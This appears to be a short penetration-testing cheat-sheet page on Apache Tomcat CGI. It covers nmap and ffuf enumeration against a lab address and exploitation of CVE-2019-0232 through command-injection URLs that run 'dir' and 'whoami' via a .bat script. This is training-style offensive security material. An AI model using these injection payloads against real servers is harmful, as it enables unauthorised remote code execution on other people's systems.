Tomcat CGI

Enumeration

Using NMAP

$ nmap -p- -sC -Pn 10.129.204.227 --open 

8080/tcp  open  http-proxy
|_http-title: Apache Tomcat/9.0.17
|_http-favicon: Apache Tomcat

Fuzzing .bat and .cgi

$ ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd
$ ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

Exploitation

CVE-2019-0232

Assuming we found welcome.bat, http://10.129.204.227:8080/cgi/welcome.bat?&dir

If path variable is unset, use this command to use whoami command

http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

use set command on windows to view the path variables

Notes

Important Vulnerabilities

CVE-2019-0232 (version 9.0.0.M1 <= 9.0.17, 8.5.0 <= 8.5.39, and 7.0.0 <= 7.0.93)

Remote Code Execution on Windows System if enableCmdLineArguments is enabled
POC http://example.com/cgi-bin/hello.bat?&dir

PreviousGitlab NextCGI Applications

Last updated 2 years ago